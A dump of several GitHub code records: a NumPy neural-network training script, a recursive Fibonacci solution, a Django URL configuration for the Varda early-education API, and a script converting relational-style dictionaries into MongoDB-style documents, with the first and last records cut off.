30] #number of hidden units\nHplus1 = [x+1 for x in H]\neph=500 #number of epochs\nl=.999; eta = .1 # l: decrement factor, eta: learning rate\nalpha=0.5 #momentum factor\ne_list=[9, 199, 499] #epoch numbers for training data figures with best H\nbest_H=[H[1]]\n\n#sizes of training, validation and test sets are different, thus MSE is used instead of SSE\nerr_tra_list = [[] for i in range(len(H))] #list for training MSE's\nerr_val_list = [[] for i in range(len(H))] #list for validation MSE's\ntra_y_list = np.zeros((len(H),len(tra_x))) #list for training predictions\nT_zero = [[] for i in range(len(H))] #list for bias hidden unit weight to output\nT_zero2 = [] #list for bias hidden unit weight to output\n\nw_list = np.zeros((sum(H), 2)) #list for final weights on 3 different H values\nT_list = np.zeros((sum(H)+3, 1)) #list for final weights on 3 different H values\nwx_list = np.zeros((sum(H), len(tra_x))) #list for hidden unit lines\nzh_list = np.zeros((sum(H), len(tra_x))) #list for hidden unit outputs\nzhT_list = np.zeros((sum(H), len(tra_x))) #list for hidden unit weighted outputs\nwx_list2 = np.zeros((sum(H), len(tra_x))) #list for hidden unit lines\nzh_list2 = np.zeros((sum(H), len(tra_x))) #list for hidden unit outputs\nzhT_list2 = np.zeros((sum(H), len(tra_x))) #list for hidden unit weighted outputs\nfor cv, h in enumerate(H):\n #initialize first and second layer weights\n w=np.random.uniform(-.01, .01, (h, 2))\n T=np.random.uniform(-.01, .01, h+1)\n for e in range(eph):\n #print(\"epoch: \", e)\n err_tra=0\n err_val=0\n t1_idx = list(range(d[0]))\n np.random.shuffle(t1_idx)\n prev_dw=0 #initialize weight change of previous instance\n for t1, t2 in itertools.zip_longest(t1_idx, range(d[1])): # d[1] is the dimension of the validation set\n #training set\n tra_x_t1=np.append(1, tra_x[t1])\n zh = sigmoid(np.dot(w,tra_x_t1))\n zh_all = np.append(1, zh) #set bias unit to 1\n tra_y = np.sum(T*zh_all)\n dT = eta*(tra_r[t1]-tra_y)*zh_all\n dw = np.outer((eta*(tra_r[t1]-tra_y)*T[1:])*sigmoid(zh, derivative=True), tra_x_t1)-alpha*prev_dw\n prev_dw=dw # weight change of previous instance for momentum calculations\n w+=dw\n T+=dT\n err_tra+= pow((tra_r[t1]-tra_y), 2)/len(tra_x) # MSE for training instances\n #store predictions for the last epoch\n if e==eph-1:\n tra_y_list[cv][t1]=tra_y\n #validation set\n try:\n val_x_t2=np.append(1, val_x[t2])\n zh_val = sigmoid(np.dot(w,val_x_t2))\n zh_val_all = np.append(1, zh_val) #set bias unit to 1\n val_y = np.sum(T*zh_val_all)\n err_val+= pow((val_r[t2]-val_y), 2)/len(val_x) # MSE for validation #instances\n except:\n pass\n eta*=l\n err_tra_list[cv].append(err_tra)\n try:\n err_val_list[cv].append(err_val)\n except:\n pass\n if e in e_list and h==H[1]:\n wx2=np.dot(w,np.vstack((np.ones((40,)), tra_x)))\n wx_list2[sum(H[:cv]):sum(H[:cv+1]),:]=wx2\n zhs2=sigmoid(np.dot(w,np.vstack((np.ones((40,)), tra_x))))\n zh_list2[sum(H[:cv]):sum(H[:cv+1]),:]=zhs2\n zhT2=(((sigmoid(np.dot(w,np.vstack((np.ones((40,)), tra_x))))).T)*T[1:]).T\n zhT_list2[sum(H[:cv]):sum(H[:cv+1]),:]=zhT2\n T_zero2.append(T[0])\n hiddenfigures(best_H, wx_list2, zh_list2, zhT_list2, T_zero2, e+1)\n\n T_zero[cv]=T[0]\n w_list[sum(H[:cv]):sum(H[:cv+1]),:]=w\n T_list[sum(Hplus1[:cv]):sum(Hplus1[:cv+1])]=T.reshape(H[cv]+1, 1)\n wx=np.dot(w,np.vstack((np.ones((40,)), tra_x)))\n wx_list[sum(H[:cv]):sum(H[:cv+1]),:]=wx\n zhs=sigmoid(np.dot(w,np.vstack((np.ones((40,)), tra_x))))\n zh_list[sum(H[:cv]):sum(H[:cv+1]),:]=zhs\n zhT=(((sigmoid(np.dot(w,np.vstack((np.ones((40,)), tra_x))))).T)*T[1:]).T\n zhT_list[sum(H[:cv]):sum(H[:cv+1]),:]=zhT\n print(\"MSE for training with H={} is {}\".format(H[cv],err_tra_list[cv][-1]))\n print(\"MSE for validation with H={} is {}\".format(H[cv],err_val_list[cv][-1]))\n\n#plot errors\nfig,ax = plt.subplots()\nax.plot(range(eph), err_tra_list[1], '-', alpha=.8)\nax.plot(range(eph), err_val_list[1], '--', dashes=(1,2), alpha=.8 )\nax.legend(['Training', 'Validation'])\nplt.title('MSE for Training&Validation Sets with H={}'.format(H[1]))\nplt.xlabel('Epochs')\nplt.ylabel('MSE')\nax.set_ylim([0,1])\n\n#test set\nerr_test=0 #MSE for test set\nfor t in range(d[2]): # d[2] is the dimension of the test set\n test_x_t=np.append(1, test_x[t])\n zh = sigmoid(np.dot(w_list[2:6],test_x_t))\n zh_all = np.append(1, zh) #set bias unit to 1\n test_y = np.sum(T_list[3:8]*zh_all.reshape(5,1))\n err_test+= pow((test_r[t]-test_y), 2)/len(test_x) # MSE for test set instances\nMSE_test = err_test\nprint(MSE_test)\nhiddenfigures(H, wx_list, zh_list, zhT_list, T_zero, e+1)\n","repo_name":"zeynep-ozturk/neural-networks","sub_path":"neural_networks.py","file_name":"neural_networks.py","file_ext":"py","file_size_in_byte":7277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24894466323","text":"# Fn = Fn-1 + Fn-2 (n ≥ 2)\ndef fibo(n):\n if n == 1 or n == 2:\n return 1\n elif n == 0:\n return 0\n else:\n return fibo(n-1) + fibo(n-2)\n \na = int(input())\n\nprint(fibo(a))","repo_name":"hayleyun/baekjoon","sub_path":"10870피보나치수5.py","file_name":"10870피보나치수5.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8348693275","text":"\"\"\"webapps URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/dev/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nimport re\n\nfrom django.apps import apps\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom django.contrib.auth import views as auth_views\nfrom django.urls import include, re_path\nfrom django.views.decorators.clickjacking import xframe_options_exempt, xframe_options_sameorigin\nfrom django_spaghetti.views import Plate\nfrom drf_yasg import openapi\nfrom drf_yasg.views import get_schema_view as get_schema_view_yasg\nfrom rest_framework import permissions, routers\nfrom rest_framework.renderers import CoreJSONRenderer\nfrom rest_framework.schemas import get_schema_view\nfrom rest_framework_nested import routers as nested_routers\n\nfrom varda import (views, viewsets, viewsets_admin, viewsets_henkilosto, viewsets_julkinen, viewsets_oppija,\n viewsets_reporting, viewsets_ui)\nfrom varda.cas.cas_components import OppijaCasLoginView\nfrom varda.constants import SWAGGER_DESCRIPTION\nfrom varda.custom_swagger import PublicSchemaGenerator, PublicSwaggerRenderer\nfrom varda.monkey_patch import cas_views, oppija_cas_views\n\n\n# /api/admin/\nrouter_admin = routers.DefaultRouter()\nrouter_admin.register(r'users', viewsets.UserViewSet)\nrouter_admin.register(r'groups', viewsets.GroupViewSet)\nrouter_admin.register(r'update-henkilo', viewsets.UpdateHenkiloWithOid, basename='update-henkilo')\nrouter_admin.register(r'huoltajat', viewsets.HuoltajaViewSet)\nrouter_admin.register(r'huoltajuussuhteet', viewsets.HuoltajuussuhdeViewSet)\nrouter_admin.register(r'clear-cache', viewsets.ClearCacheViewSet, basename='clear-cache')\nrouter_admin.register(r'hae-yksiloimattomat', viewsets.HaeYksiloimattomatHenkilotViewSet, basename='hae-yksiloimattomat')\nrouter_admin.register(r'anonymisointi-yhteenveto', viewsets_admin.AnonymisointiYhteenvetoViewSet, basename='anonymisointi-yhteenveto')\nrouter_admin.register(r'duplicate-lapsi-objects', viewsets_reporting.DuplicateLapsiViewSet, basename='duplicate-lapsi-objects')\nrouter_admin.register(r'set-paattymis-pvm', viewsets_admin.SetPaattymisPvmViewSet, basename='set-paattymis-pvm')\n\n# /api/admin/huoltajat/.../\nrouter_admin_nested_huoltaja = nested_routers.NestedSimpleRouter(router_admin, r'huoltajat', lookup='huoltaja')\n# /api/admin/huoltajat/{id}/lapset/\nrouter_admin_nested_huoltaja.register(r'lapset', viewsets.NestedLapsiViewSet)\n\n# /api/user/\nrouter_user = routers.DefaultRouter()\nrouter_user.register(r'data', viewsets.ActiveUserViewSet)\nrouter_user.register(r'apikey', viewsets.ApikeyViewSet)\n\n# /api/pulssi/\nrouter_pulssi = routers.DefaultRouter()\nrouter_pulssi.register(r'vakajarjestajat', viewsets.PulssiVakajarjestajat, basename='pulssi-vakajarjestajat')\n\n# /api/v1/\nrouter = routers.DefaultRouter()\nrouter.register(r'vakajarjestajat', viewsets.OrganisaatioViewSet)\nrouter.register(r'toimipaikat', viewsets.ToimipaikkaViewSet)\nrouter.register(r'toiminnallisetpainotukset', viewsets.ToiminnallinenPainotusViewSet)\nrouter.register(r'kielipainotukset', viewsets.KieliPainotusViewSet)\nrouter.register(r'hae-henkilo', viewsets.HaeHenkiloViewSet, 'hae-henkilo')\nrouter.register(r'henkilot', viewsets.HenkiloViewSet)\nrouter.register(r'lapset', viewsets.LapsiViewSet)\nrouter.register(r'maksutiedot', viewsets.MaksutietoViewSet)\nrouter.register(r'varhaiskasvatuspaatokset', viewsets.VarhaiskasvatuspaatosViewSet)\nrouter.register(r'varhaiskasvatussuhteet', viewsets.VarhaiskasvatussuhdeViewSet)\nrouter.register(r'paos-toiminnat', viewsets.PaosToimintaViewSet)\nrouter.register(r'paos-oikeudet', viewsets.PaosOikeusViewSet)\n\n# /api/v1/vakajarjestajat/.../\nrouter_nested_vakajarjestaja = nested_routers.NestedSimpleRouter(router, r'vakajarjestajat', lookup='organisaatio')\n# /api/v1/vakajarjestajat/{id}/toimipaikat/\nrouter_nested_vakajarjestaja.register(r'toimipaikat', viewsets.NestedToimipaikkaViewSet)\n# /api/v1/vakajarjestajat/{id}/yhteenveto/\nrouter_nested_vakajarjestaja.register(r'yhteenveto', viewsets.NestedOrganisaatioYhteenvetoViewSet)\n# /api/v1/vakajarjestajat/{id}/error-report-lapset/\nrouter_nested_vakajarjestaja.register('error-report-lapset', viewsets_reporting.ErrorReportLapsetViewSet, basename='error-report-lapset')\n# /api/v1/vakajarjestajat/{id}/error-report-tyontekijat/\nrouter_nested_vakajarjestaja.register('error-report-tyontekijat', viewsets_reporting.ErrorReportTyontekijatViewSet, basename='error-report-tyontekijat')\n# /api/v1/vakajarjestajat/{id}/error-report-toimipaikat/\nrouter_nested_vakajarjestaja.register('error-report-toimipaikat', viewsets_reporting.ErrorReportToimipaikatViewSet, basename='error-report-toimipaikat')\n# /api/v1/vakajarjestajat/{id}/paos-toimijat/\nrouter_nested_vakajarjestaja.register(r'paos-toimijat', viewsets.NestedVakajarjestajaPaosToimijatViewSet)\n# /api/v1/vakajarjestajat/{id}/paos-toimipaikat/\nrouter_nested_vakajarjestaja.register(r'paos-toimipaikat', viewsets.NestedVakajarjestajaPaosToimipaikatViewSet)\n\n# /api/v1/toimipaikat/.../\nrouter_nested_toimipaikka = nested_routers.NestedSimpleRouter(router, r'toimipaikat', lookup='toimipaikka')\n# /api/v1/toimipaikat/{id}/toiminnallisetpainotukset/\nrouter_nested_toimipaikka.register(r'toiminnallisetpainotukset', viewsets.NestedToiminnallinenPainotusViewSet)\n# /api/v1/toimipaikat/{id}/kielipainotukset/\nrouter_nested_toimipaikka.register(r'kielipainotukset', viewsets.NestedKieliPainotusViewSet)\n# /api/v1/toimipaikat/{id}/varhaiskasvatussuhteet/\nrouter_nested_toimipaikka.register(r'varhaiskasvatussuhteet', viewsets.NestedVarhaiskasvatussuhdeToimipaikkaViewSet)\n\n# /api/v1/lapset/.../\nrouter_nested_lapsi = nested_routers.NestedSimpleRouter(router, r'lapset', lookup='lapsi')\n# /api/v1/lapset/{id}/huoltajat/\nrouter_nested_lapsi.register(r'huoltajat', viewsets.NestedHuoltajaViewSet)\n# /api/v1/lapset/{id}/varhaiskasvatuspaatokset/\nrouter_nested_lapsi.register(r'varhaiskasvatuspaatokset', viewsets.NestedVarhaiskasvatuspaatosViewSet)\n# /api/v1/lapset/{id}/maksutiedot/\nrouter_nested_lapsi.register(r'maksutiedot', viewsets.NestedLapsiMaksutietoViewSet)\n# /api/v1/lapset/{id}/varhaiskasvatussuhteet/\nrouter_nested_lapsi.register(r'varhaiskasvatussuhteet', viewsets.NestedLapsenVarhaiskasvatussuhdeViewSet)\n# /api/v1/lapset/{id}/kooste/\nrouter_nested_lapsi.register(r'kooste', viewsets.NestedLapsiKoosteViewSet)\n\n# /api/v1/varhaiskasvatuspaatokset/.../\nrouter_nested_varhaiskasvatuspaatos = nested_routers.NestedSimpleRouter(router, r'varhaiskasvatuspaatokset', lookup='varhaiskasvatuspaatos')\n# /api/v1/varhaiskasvatuspaatokset/{id}/varhaiskasvatussuhteet/\nrouter_nested_varhaiskasvatuspaatos.register(r'varhaiskasvatussuhteet', viewsets.NestedVarhaiskasvatussuhdeViewSet)\n\n# /api/ui/\nrouter_ui = routers.DefaultRouter()\nrouter_ui.register(r'vakajarjestajat', viewsets_ui.UiVakajarjestajatViewSet, basename='hae-vakajarjestajat')\nrouter_ui.register(r'all-vakajarjestajat', viewsets_ui.AllVakajarjestajaViewSet, basename='all-vakajarjestajat')\n\n# /api/ui/vakajarjestajat/.../\nrouter_ui_nested_vakajarjestaja = nested_routers.NestedSimpleRouter(router_ui, r'vakajarjestajat', lookup='organisaatio')\n# /api/ui/vakajarjestajat/{id}/toimipaikat/\nrouter_ui_nested_vakajarjestaja.register(r'toimipaikat', viewsets_ui.NestedToimipaikkaViewSet)\n# /api/ui/vakajarjestajat/{id}/lapset/\nrouter_ui_nested_vakajarjestaja.register(r'lapset', viewsets_ui.UiNestedLapsiViewSet)\n# /api/ui/vakajarjestajat/{id}/tyontekijat/\nrouter_ui_nested_vakajarjestaja.register(r'tyontekijat', viewsets_ui.UiNestedTyontekijaViewSet)\n# /api/ui/vakajarjestajat/{id}/all-toimipaikat/\nrouter_ui_nested_vakajarjestaja.register(r'all-toimipaikat', viewsets_ui.NestedAllToimipaikkaViewSet)\n\n# /api/onr/\nrouter_onr = routers.DefaultRouter()\nrouter_onr.register(r'external-permissions', viewsets.ExternalPermissionsViewSet, 'external-permissions')\n\n# /api/reporting/\nrouter_reporting = routers.DefaultRouter()\n# /api/reporting/v1/tiedonsiirtotilasto/\nrouter_reporting.register(r'tiedonsiirtotilasto', viewsets_reporting.TiedonsiirtotilastoViewSet, basename='tiedonsiirtotilasto')\n# /api/reporting/v1/tiedonsiirto/\nrouter_reporting.register(r'tiedonsiirto', viewsets_reporting.TiedonsiirtoViewSet, basename='tiedonsiirto')\n# /api/reporting/v1/tiedonsiirto/yhteenveto/\nrouter_reporting.register(r'tiedonsiirto/yhteenveto', viewsets_reporting.TiedonsiirtoYhteenvetoViewSet, basename='tiedonsiirto-yhteenveto')\n# /api/reporting/v1/excel-reports/\nrouter_reporting.register(r'excel-reports', viewsets_reporting.ExcelReportViewSet, basename='excel-reports')\n# /api/reporting/v1/transfer-outage/\nrouter_reporting.register(r'transfer-outage', viewsets_reporting.TransferOutageReportViewSet, basename='transfer-outage')\n# /api/reporting/v1/request-summary/\nrouter_reporting.register(r'request-summary', viewsets_reporting.RequestSummaryViewSet, basename='request-summary')\n\n# /api/reporting/v1/kela/etuusmaksatus/\nrouter_kela_reporting = routers.DefaultRouter()\nrouter_kela_reporting.register(r'aloittaneet', viewsets_reporting.KelaEtuusmaksatusAloittaneetViewset, basename='aloittaneet')\nrouter_kela_reporting.register(r'lopettaneet', viewsets_reporting.KelaEtuusmaksatusLopettaneetViewSet, 'lopettaneet')\nrouter_kela_reporting.register(r'maaraaikaiset', viewsets_reporting.KelaEtuusmaksatusMaaraaikaisetViewSet, 'maaraaikaset')\nrouter_kela_reporting.register(r'korjaustiedot', viewsets_reporting.KelaEtuusmaksatusKorjaustiedotViewSet, 'korjaustiedot')\nrouter_kela_reporting.register(r'korjaustiedotpoistetut', viewsets_reporting.KelaEtuusmaksatusKorjaustiedotPoistetutViewSet, 'korjaustiedotpoistetut')\n\n# /api/reporting/v1/tilastokeskus/\nrouter_tilastokeskus_reporting = routers.DefaultRouter()\nrouter_tilastokeskus_reporting.register(r'organisaatiot', viewsets_reporting.TkOrganisaatiot, basename='organisaatiot')\nrouter_tilastokeskus_reporting.register(r'varhaiskasvatustiedot', viewsets_reporting.TkVakatiedot, basename='varhaiskasvatustiedot')\nrouter_tilastokeskus_reporting.register(r'henkilostotiedot', viewsets_reporting.TkHenkilostotiedot, basename='henkilostotiedot')\n\n# /api/reporting/v1/valssi/\nrouter_valssi_reporting = routers.DefaultRouter()\nrouter_valssi_reporting.register(r'organisaatiot', viewsets_reporting.ValssiOrganisaatioViewSet, basename='valssi-organisaatiot')\nrouter_valssi_reporting.register(r'toimipaikat', viewsets_reporting.ValssiToimipaikkaViewSet, basename='valssi-toimipaikat')\n\n# /api/reporting/v1/valssi/organisaatiot/.../\nrouter_valssi_reporting_nested_organisaatio = nested_routers.NestedSimpleRouter(router_valssi_reporting, r'organisaatiot', lookup='organisaatio')\n# /api/reporting/v1/valssi/organisaatiot/{id}/taustatiedot/\nrouter_valssi_reporting_nested_organisaatio.register(r'taustatiedot', viewsets_reporting.ValssiTaustatiedotViewSet)\n\n# /api/reporting/v1/valssi/toimipaikat/.../\nrouter_valssi_reporting_nested_toimipaikka = nested_routers.NestedSimpleRouter(router_valssi_reporting, r'toimipaikat', lookup='toimipaikka')\n# /api/reporting/v1/valssi/toimipaikat/{id}/tyontekijat/\nrouter_valssi_reporting_nested_toimipaikka.register(r'tyontekijat', viewsets_reporting.ValssiTyontekijaViewSet)\n\n# /api/oppija/v1/\nrouter_oppija = routers.DefaultRouter()\n# /api/oppija/v1/henkilotiedot/{oid}/\nrouter_oppija.register(r'henkilotiedot', viewsets_oppija.HenkilotiedotViewSet)\n# /api/oppija/v1/varhaiskasvatustiedot/{oid}/\nrouter_oppija.register(r'varhaiskasvatustiedot', viewsets_oppija.VarhaiskasvatustiedotViewSet)\n# /api/oppija/v1/huoltajatiedot/{oid}/\nrouter_oppija.register(r'huoltajatiedot', viewsets_oppija.HuoltajatiedotViewSet)\n# /api/oppija/v1/tyontekijatiedot/{oid}/\nrouter_oppija.register(r'tyontekijatiedot', viewsets_oppija.TyontekijatiedotViewSet)\n\n# /api/henkilosto/v1/\nrouter_henkilosto = routers.DefaultRouter()\nrouter_henkilosto.register(r'tyontekijat', viewsets_henkilosto.TyontekijaViewSet)\nrouter_henkilosto.register(r'tilapainen-henkilosto', viewsets_henkilosto.TilapainenHenkilostoViewSet)\nrouter_henkilosto.register(r'tutkinnot', viewsets_henkilosto.TutkintoViewSet)\nrouter_henkilosto.register(r'palvelussuhteet', viewsets_henkilosto.PalvelussuhdeViewSet)\nrouter_henkilosto.register(r'tyoskentelypaikat', viewsets_henkilosto.TyoskentelypaikkaViewSet)\nrouter_henkilosto.register(r'pidemmatpoissaolot', viewsets_henkilosto.PidempiPoissaoloViewSet)\nrouter_henkilosto.register(r'taydennyskoulutukset', viewsets_henkilosto.TaydennyskoulutusViewSet)\n\n# /api/henkilosto/v1/tyontekijat/.../\nrouter_henkilosto_nested_tyontekija = nested_routers.NestedDefaultRouter(router_henkilosto, r'tyontekijat', lookup='tyontekija')\n# /api/henkilosto/v1/tyontekijat/{id}/kooste/\nrouter_henkilosto_nested_tyontekija.register(r'kooste', viewsets_henkilosto.NestedTyontekijaKoosteViewSet)\n\n# /api/henkilosto/v2/\nrouter_henkilosto_v2 = routers.DefaultRouter()\nrouter_henkilosto_v2.register(r'taydennyskoulutukset', viewsets_henkilosto.TaydennyskoulutusV2ViewSet, basename='taydennyskoulutukset-v2')\n\n# /api/julkinen/v1/\nrouter_julkinen = routers.DefaultRouter()\nrouter_julkinen.register(r'koodistot', viewsets_julkinen.KoodistotViewSet)\nrouter_julkinen.register(r'localisation', viewsets_julkinen.LocalisationViewSet, basename='get-localisation')\nrouter_julkinen.register(r'pulssi', viewsets_julkinen.PulssiViewSet, basename='get-pulssi')\n\n# /api/v1/schema/\nschema_view = get_schema_view(title='VARDA API', renderer_classes=[CoreJSONRenderer])\n\n# In production environment public-app accesses iframes via nginx proxy, so we can use a stricter policy\nxframe_options = xframe_options_sameorigin if settings.PRODUCTION_ENV or settings.QA_ENV else xframe_options_exempt\n\n# /api/julkinen/v1/swagger/\nschema_view_public = get_schema_view_yasg(\n openapi.Info(\n title='VARDA REST API',\n default_version='v1',\n description=SWAGGER_DESCRIPTION\n ),\n public=True,\n url='https://varda.example.com/api/',\n permission_classes=(permissions.AllowAny,),\n generator_class=PublicSchemaGenerator,\n)\npublic_swagger_view = xframe_options(\n schema_view_public.as_cached_view(cache_timeout=0, cache_kwargs=None,\n renderer_classes=(PublicSwaggerRenderer,) + schema_view_public.renderer_classes)\n)\n\n# /api/julkinen/v1/data-model/\nexcluded_model_regex = re.compile(r'^(historical.*)|(z\\d.*)|(logdata)|(aikaleima)|(batcherror)|(logincertificate)$')\nmodel_visualization_view = xframe_options(\n Plate.as_view(\n settings={\n 'apps': ['varda'],\n 'show_fields': False,\n 'exclude': {'varda': [model.__name__.lower() for model in apps.get_app_config('varda').get_models()\n if excluded_model_regex.fullmatch(model.__name__.lower())]}}\n )\n)\n\nurlpatterns = [\n re_path(r'^$', views.index, name='index'),\n re_path(r'^admin/', admin.site.urls, name='admin'),\n re_path(r'^varda/', include('varda.urls'), name='varda'),\n re_path(r'^accounts/login$', cas_views.LoginView.as_view(), name='cas_ng_login'),\n re_path(r'^accounts/logout$', cas_views.LogoutView.as_view(), name='cas_ng_logout'),\n re_path(r'^accounts/callback$', cas_views.CallbackView.as_view(), name='cas_ng_proxy_callback'),\n re_path(r'^accounts/huoltaja-login$', OppijaCasLoginView.as_view(), name='oppija_cas_ng_login'),\n re_path(r'^accounts/huoltaja-logout$', oppija_cas_views.LogoutView.as_view(), name='oppija_cas_ng_logout'),\n re_path(r'^accounts/password-reset/?$', auth_views.PasswordResetView.as_view(), name='admin_password_reset'),\n re_path(r'^accounts/password-reset/done/?$', auth_views.PasswordResetDoneView.as_view(), name='password_reset_done'),\n re_path(r'^accounts/reset/(?P.+)/(?P.+)/?$', auth_views.PasswordResetConfirmView.as_view(), name='password_reset_confirm'),\n re_path(r'^accounts/reset/done/?$', auth_views.PasswordResetCompleteView.as_view(), name='password_reset_complete'),\n re_path(r'^api-auth/', include('varda.custom_login_urls', namespace='rest_framework'), name='api_auth'),\n re_path(r'^api/onr/', include(router_onr.urls), name='api_onr'),\n re_path(r'^api/user/', include(router_user.urls), name='api_user'),\n re_path(r'^api/admin/', include(router_admin.urls), name='api_admin'),\n re_path(r'^api/admin/', include(router_admin_nested_huoltaja.urls), name='api_admin_nested_huoltaja'),\n re_path(r'^api/pulssi/', include(router_pulssi.urls), name='api_pulssi'),\n re_path(r'^api/ui/', include(router_ui.urls), name='api_ui'),\n re_path(r'^api/ui/', include(router_ui_nested_vakajarjestaja.urls), name='api_ui_nested_vakajarjestaja'),\n re_path(r'^api/v1/', include(router.urls), name='api_v1'),\n re_path(r'^api/v1/', include(router_nested_vakajarjestaja.urls), name='api_v1_nested_vakajarjestaja'),\n re_path(r'^api/v1/', include(router_nested_toimipaikka.urls), name='api_v1_nested_toimipaikka'),\n re_path(r'^api/v1/', include(router_nested_lapsi.urls), name='api_v1_nested_lapsi'),\n re_path(r'^api/v1/', include(router_nested_varhaiskasvatuspaatos.urls), name='api_v1_nested_varhaiskasvatuspaatos'),\n re_path(r'^api/v1/schema/', schema_view, name='api_v1_schema'),\n re_path(r'^api/reporting/v1/', include(router_reporting.urls), name='api_reporting_v1'),\n re_path(r'^api/reporting/v1/kela/etuusmaksatus/', include(router_kela_reporting.urls), name='api_reporting_v1_kela'),\n re_path(r'^api/reporting/v1/tilastokeskus/', include(router_tilastokeskus_reporting.urls), name='api_reporting_v1_tilastokeskus'),\n re_path(r'^api/reporting/v1/valssi/', include(router_valssi_reporting.urls), name='api_reporting_v1_valssi'),\n re_path(r'^api/reporting/v1/valssi/', include(router_valssi_reporting_nested_organisaatio.urls), name='api_reporting_v1_valssi_nested_organisaatio'),\n re_path(r'^api/reporting/v1/valssi/', include(router_valssi_reporting_nested_toimipaikka.urls), name='api_reporting_v1_valssi_nested_toimipaikka'),\n re_path(r'^api/henkilosto/v1/', include(router_henkilosto.urls), name='api_henkilosto_v1'),\n re_path(r'^api/henkilosto/v1/', include(router_henkilosto_nested_tyontekija.urls), name='api_henkilosto_v1_nested_tyontekija'),\n re_path(r'^api/henkilosto/v2/', include(router_henkilosto_v2.urls), name='api_henkilosto_v2'),\n re_path(r'^api/oppija/v1/', include(router_oppija.urls), name='api_oppija_v1'),\n re_path(r'^api/julkinen/v1/', include(router_julkinen.urls), name='api_julkinen_v1'),\n re_path(r'^api/julkinen/v1/swagger/$', public_swagger_view, name='api_julkinen_v1_swagger'),\n re_path(r'^api/julkinen/v1/data-model/$', model_visualization_view, name='api_julkinen_v1_data_model'),\n]\n","repo_name":"Opetushallitus/varda","sub_path":"webapps/webapps/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":19039,"program_lang":"python","lang":"fi","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"35821795256","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2023/9/29 14:42\n@user: jiananwang\n@title: SQL_to_noSQL\n\"\"\"\nfrom typing import List, Any\n\ncustomer_dict = {\n \"1000\": \"Ben Choi\",\n \"1001\": \"Jayden Choi\",\n \"1002\": \"Cammy Soh\",\n \"1004\": \"Mason Greenwood\",\n \"1005\": \"Dean Henderson\",\n}\n\nproduct_dict = {\n \"50001\": (\"Scott Pick A Size Multi Purpose Towels\", 4.25),\n \"50002\": (\"Japanese Super Crispy Chicken\", 11.80),\n \"50003\": (\"Vegan Beyond Burger Plant Based Patties Beef\", 14.90),\n \"50004\": (\"Korean Honey Sweet Potato\", 9.90),\n \"50005\": (\"Premium Atlantic Salmon 1Kg\", 22.00)\n}\n\norder_dict = {\n \"1880001\": (\"1000\", \"2020/01/21\"),\n \"1880002\": (\"1000\", \"2020/01/22\"),\n \"1880003\": (\"1000\", \"2020/01/23\"),\n \"1880004\": (\"1001\", \"2020/01/22\"),\n \"1880005\": (\"1001\", \"2020/01/23\"),\n \"1880006\": (\"1004\", \"2020/01/24\"),\n \"1880007\": (\"1005\", \"2020/01/25\"),\n}\n\norder_line_dict = {\n (\"1000\", \"1880001\", \"50001\"): 2,\n (\"1000\", \"1880001\", \"50003\"): 1,\n (\"1000\", \"1880002\", \"50002\"): 2,\n (\"1000\", \"1880003\", \"50004\"): 4,\n (\"1000\", \"1880003\", \"50005\"): 2,\n (\"1001\", \"1880004\", \"50003\"): 1,\n (\"1001\", \"1880004\", \"50004\"): 1,\n (\"1001\", \"1880005\", \"50002\"): 2,\n (\"1004\", \"1880006\", \"50004\"): 1,\n (\"1004\", \"1880006\", \"50005\"): 1,\n (\"1005\", \"1880007\", \"50002\"): 2,\n (\"1005\", \"1880007\", \"50003\"): 1,\n (\"1005\", \"1880007\", \"50001\"): 2\n}\n\n\ndef get_customer_order_id(customer_id: str, order_dict: dict) -> list[Any] | str:\n order_list = []\n for k, b in order_dict.items():\n if b[0] == customer_id:\n order_list.append(k)\n\n if order_list:\n return order_list\n return \"null\"\n\n\ndef get_productInfors(orderid: str) -> list:\n def make_string(productid: str, quantity: int, price: float) -> dict:\n product_infro_dict = {\"prodcutID\": str(productid),\n \"quantity\": quantity,\n \"price\": price}\n return product_infro_dict\n\n productInfors = []\n for k_order_line, v_order_line in order_line_dict.items():\n if orderid == k_order_line[1]:\n product_id = k_order_line[2]\n product_quantity = v_order_line\n product_price = product_dict[product_id][1]\n productInfors.append(make_string(product_id, product_quantity, product_price))\n\n return productInfors\n\n\nfor k, v in customer_dict.items():\n print(f\"\"\"{{\n \"_id\": \"{k}\",\n \"customerName\": \"{v}\",\n \"customerOrder\": {get_customer_order_id(k, order_dict)}\n }},\n \"\"\", end=\"\")\nprint()\nprint()\nprint(\"-------------\"*2)\n\nfor k, v in order_dict.items():\n print(f\"\"\"\n {{\n \"_id\": \"{k}\",\n \"orderDate\": \"{v[1]}\",\n \"customerID\": \"{v[0]}\",\n \"productInfors\":\n {get_productInfors(orderid=k)}\n }},\"\"\", end=\"\")\n\nprint()\nprint()\nprint(\"-------------\"*2)\n\nfor k, v in product_dict.items():\n print(f\"\"\"\n {{\n \"_id\": \"{k}\",\n \"productName\": \"{v[0]}\",\n \"standardPrice\": {v[1]}\n }},\"\"\", end=\"\")\n","repo_name":"Woniulol/fromAccToSomethingElse","sub_path":"dataBase/mongoDb/week9DataClean.py","file_name":"week9DataClean.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27710630186","text":"\"\"\"\nGiven a config file, transform a pretrained ViTModel.\n\"\"\"\nimport os\nfrom config.yolos_tiny_config import yolos, args\n\nimport torch\ninit_method = 'tcp://'\nmaster_ip = os.getenv('MASTER_ADDR', '127.0.0.1')\nmaster_port = os.getenv('MASTER_PORT', '16666')\ninit_method += master_ip + ':' + master_port\ntorch.distributed.init_process_group(\n backend='nccl',\n world_size=args.world_size, 